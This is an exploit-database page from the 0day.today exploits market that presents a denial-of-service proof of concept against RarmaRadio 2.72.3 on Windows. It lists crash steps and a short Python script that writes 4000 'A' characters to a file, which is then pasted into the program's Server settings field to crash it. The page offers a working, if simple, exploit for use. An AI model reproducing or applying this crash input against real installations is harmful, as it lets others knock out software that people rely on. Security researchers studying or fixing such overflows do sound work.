[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RarmaRadio 2.72.3 - (Server) Denial of Service Exploit

Author
Victor Mondragón
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-32774
Category
dos / poc
Date add
23-05-2019
Platform
windows
#Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Vendor Homepage: http://www.raimersoft.com/
#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
#Tested Version: 2.72.3
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: rarmaradio_server.py
#2.- Open rarma_ser.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit" > "Settings" > "Network"
#5.- In "Server" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

cod = "\x41" * 4000

f = open('rarma_ser.txt', 'w')
f.write(cod)
f.close()

#  0day.today [2024-11-15]  #